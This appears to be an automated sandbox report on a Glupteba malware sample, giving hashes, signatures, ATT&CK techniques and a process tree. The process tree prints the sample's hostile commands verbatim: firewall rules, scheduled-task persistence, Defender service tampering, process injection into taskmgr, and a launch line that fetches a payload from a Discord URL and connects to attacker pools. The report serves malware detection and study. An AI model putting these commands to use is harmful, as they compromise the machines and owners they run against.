Analysis
-
max time kernel
290s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
16/05/2024, 23:40
General
-
Target
91deee0e5954ec7a7fa5505d7f9c97c7e347df379758691fb1a390969b0328d3.exe
-
Size
4.1MB
-
MD5
012479b31d8e8d4cc1e99c950dd0f77d
-
SHA1
2d26e7ae6c0cbb1a66e95f35b2f6ede0835d765b
-
SHA256
91deee0e5954ec7a7fa5505d7f9c97c7e347df379758691fb1a390969b0328d3
-
SHA512
ce6b1e32007d841dac8b7478c21f336dfe5e64dcdb8e9df37902a29eef70af9e65801ee10b91cd33eada06a4965ddc0b9eaa25006e49b240a7c8461c86a9b358
-
SSDEEP
49152:P7QmEbcqaZzGq8QcqWQjVg2jH5kShpuw/ycY+0yIq1wyJFXQ2nyEuQGmme:jWbHa59Z7dviShpLY7RCwkXQ2n5oe
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 31 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Executes dropped EXE 4 IoCs
-
UPX packed file 16 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 7 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 7 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Using powershell.exe command.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of WriteProcessMemory 36 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\91deee0e5954ec7a7fa5505d7f9c97c7e347df379758691fb1a390969b0328d3.exe"C:\Users\Admin\AppData\Local\Temp\91deee0e5954ec7a7fa5505d7f9c97c7e347df379758691fb1a390969b0328d3.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\91deee0e5954ec7a7fa5505d7f9c97c7e347df379758691fb1a390969b0328d3.exe"C:\Users\Admin\AppData\Local\Temp\91deee0e5954ec7a7fa5505d7f9c97c7e347df379758691fb1a390969b0328d3.exe"2⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe4⤵
-
-
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
61KB
MD5816af2fcc4be6ea3754a251c6157d79e
SHA1d5875862aa03688c12e284f07bef015ea50e0b59
SHA2565a8f33bbe4d8dd109e479c338bd57c7fece98daae499ac3bba2824a2a8bc2e47
SHA512192e558e523bba7297abb2f5a7eda11f4df9b1d6cb87755187678d666ac130d106282a2a75324fcbf98d591359e5520ea8e065b986f6b86b0190cb6d37040c9a
-
Filesize
81KB
MD5d3ddc88e9ace4731a44235ec0c0e1d71
SHA181c13937d89aef20ff139f5617eed005f578a0e8
SHA256d1321e6008430fe90e052048485d7035a9e5f8a3069612f5c3a18d9a8ee68f55
SHA51222b34e26237ceaf0f1d0d381faa15216dd2ae2a0169eabc6b7015dcbaca2bdc0f1157692ec51e7195de5dc08777bb42d2ea83cfe8673c485414f54e20ac7ea1f
-
Filesize
98KB
MD5a22b1f80c3106888d59f7736bf11e3f0
SHA197f927068dbfbc742b69fb5af42e5ea894a1883f
SHA25694be9e0265e7ae6605650c2ac3a5b34e33b66865d0fdebe65ae4090e786511c8
SHA5124744a3aa5bfd779a3c7f61686e0df9ab2f371b70fee215c763d296c9d2705d6f8af7c044cbbb996d98f918c89076c288201ea8eae3dfe373bc6fd66a9f64a7db
-
Filesize
76KB
MD56f2c2cd2f6bb4341d0d478e6e8cff1e5
SHA1c22115ce2ad37dcab52d96d23fcfb2a254618be7
SHA25665be235933f1738ca367e71c0ae8b064612ad1bd6518d36db86d5bae1fb14734
SHA5127463511130cec509dd55bc8a59e55ad20bb678004ac28b60d7bf078724018aae5ee95c9b8716cb61df38e24d302c87eca3cf4d5f274f9a5ac860da5058e5cf46
-
Filesize
241KB
MD57ab3ef8cb2414b3f14757dedb48d9a0e
SHA1200183d5814f5686998c7b44c324b1a422a841db
SHA256661440367b1648d148368f39a6bf8d95323a4e12a79f98c39dd86aa3a96f419c
SHA51278d30064d5b35982d79097a0226a121fedfadbca719de08d50bc0321caf98d2279a10ceb1613d9878eccf53196e4bb8258b50b64d40d07d33292a44046f458d0
-
Filesize
80KB
MD56f5a1801483fb8a59fc519ab16fb6034
SHA150f958fe5810b405a7bc1ac1b02488c46fcaba67
SHA256cfefd5a21763b5e5e2ef30ace67b2abd2638cd5942df76f696df4f343c4700a4
SHA5123e86e5df8b45673a04252860a9821afcc4b7fe88acabd9fbc4f615b7d5d52925985600ce30393b74fdec95e59abf4f465d838b7bebec20034cee8cff91d8c926
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
18KB
MD569245bed7df6fa9718e953ce2e2ce7f5
SHA1f3b1b0046b95b0ada06532d3f3c6aee3531e0903
SHA256f4158f83dbbf0431df63a73e1c05a35c4664de78ee4de283be4a982aeff29b3a
SHA5127607394ac500b6dd515a4beb55e2864a832ee96698a102a01fbde0137da6ab02b6a9f0f9b1d634ce3fa2cd8b6618151a0079843856c2f0e5b5131399e7aa0428
-
Filesize
18KB
MD56c2fd03a3f6277132f67c44193245c14
SHA10ede54856ce06accddbfdb71e4b8443a41c99246
SHA25650e039eb451cc7a7e3af28896f0c80c1c58b8f83b1db33f29d3190e4d641ef12
SHA512f35a8400997d679a7ec1938b4c328ef5b405b5345fc575053e46073fcc2d2f6e43fb00aed557470c8db77b6fe58e6a8d852b2aa8927f729428d744aa25b1c8c1
-
Filesize
18KB
MD5de0df59bf55a8164228af5da4679b92b
SHA121b870de775bc745f8034a83f18baa473ad5d917
SHA256bdf02a924926293c4ce0011302c984a0e2c7b693644ec137320b7465d4f4c59e
SHA512a7386860e5acb7eb596d33872f449645b114354d93545d00af949c6f3bac6b7d7c6130e41fe8c3a86494c20b38b445ed13f331d1a5b2b3b73dd2035b5a2d8afc
-
Filesize
18KB
MD5f5cca9d378f4a7592441fbc47aed12f4
SHA120a4d22a908c7b902a6d95e799b4bbcb3cbc3052
SHA256bbfba5b65b453f03facf83f2947dd0b7b3ca9a71ce5a258609b58166f3b2327c
SHA512a284c3d3f1e78c4fa694486c9439cec9a6e6ded03ff02e78dae139652bb7ae16e599830e4dac93264452e65c7122a3d599bed8ce2aeb0fb101c223911d3c62c1
-
Filesize
18KB
MD513e86810b5d58005736f474fc7028926
SHA1fa56ae729bb673dcd7c4b6dddbc3a5fd433d5304
SHA25660dd8e00894707915c2479308357e05b323e88875f4195e5796e8edfcb870911
SHA5127482325b0d38f35d8b1e31fed970a5406c364949d4f720b9010cc0086de338f60a3577bdd46c49b87af5cef5eef1b82a43261c83b1be668bdf7d6df5a09d3cf5
-
Filesize
18KB
MD5200036e7199b29bd63a7d18ac1e5d778
SHA16b3776f38d19e6715e7c4376f521bbd24d344717
SHA25640d3287a6dd4193eb142fed33a05904dddcb6a481e234c314bd42fcbb1e9dc3c
SHA51219e799d652a430248d3c9ec37d4a1fc815b8d4d685a9cea2c696a811a95f3c32a3dd92a27c5b8995d01b047156508715a72e37339aafe739f2e2d8d86496a736
-
Filesize
18KB
MD593c3bf60fba4b1ea172e0c0a05cd57d3
SHA17e49016925df7de87d517305a0e435f7a8adcfc7
SHA2562f2e20292b788c4ff4e53228af03ca7ff0ff6cc64e7d9444fa7750cd291c5e1c
SHA51273c469b66f1020508903ba346808380f001accc65b3276d98e3d4ebf3eb888ba3d09e985ca322f63dfb953e1d67ea73f755404f954c4e5612f2ba98dadeedce3
-
Filesize
18KB
MD558ac215e70147c8cbc64aa9d4ba64b6a
SHA15ed3b21e6e8869473d8f12129bac33d18803e62e
SHA256460bc56f04fe85777efdbaaaf9d4dd851e5e1300e17a9310972061a357bc37f9
SHA5128809ede16bae9e3da0b054f4f7e2d466d1d594d816370c5a4af5f64fb67f5d792cdb8718c2700f88ea3bc90fe34f34e4675f38200a59b07c20f8dc9fa5f1699a
-
Filesize
4.1MB
MD5012479b31d8e8d4cc1e99c950dd0f77d
SHA12d26e7ae6c0cbb1a66e95f35b2f6ede0835d765b
SHA25691deee0e5954ec7a7fa5505d7f9c97c7e347df379758691fb1a390969b0328d3
SHA512ce6b1e32007d841dac8b7478c21f336dfe5e64dcdb8e9df37902a29eef70af9e65801ee10b91cd33eada06a4965ddc0b9eaa25006e49b240a7c8461c86a9b358
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
Filesize
8.8MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
4.9MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
660KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
8.9MB
-
Filesize
8.9MB
-
Filesize
4.0MB
-
Filesize
9.1MB
-
Filesize
9.1MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
660KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
136KB
-
Filesize
104KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
660KB
-
Filesize
300KB
-
Filesize
472KB
-
Filesize
240KB
-
Filesize
300KB
-
Filesize
592KB
-
Filesize
112KB
-
Filesize
204KB
-
Filesize
3.3MB
-
Filesize
32KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
6.2MB
-
Filesize
6.9MB
-
Filesize
4KB
-
Filesize
216KB
-
Filesize
9.1MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
3.3MB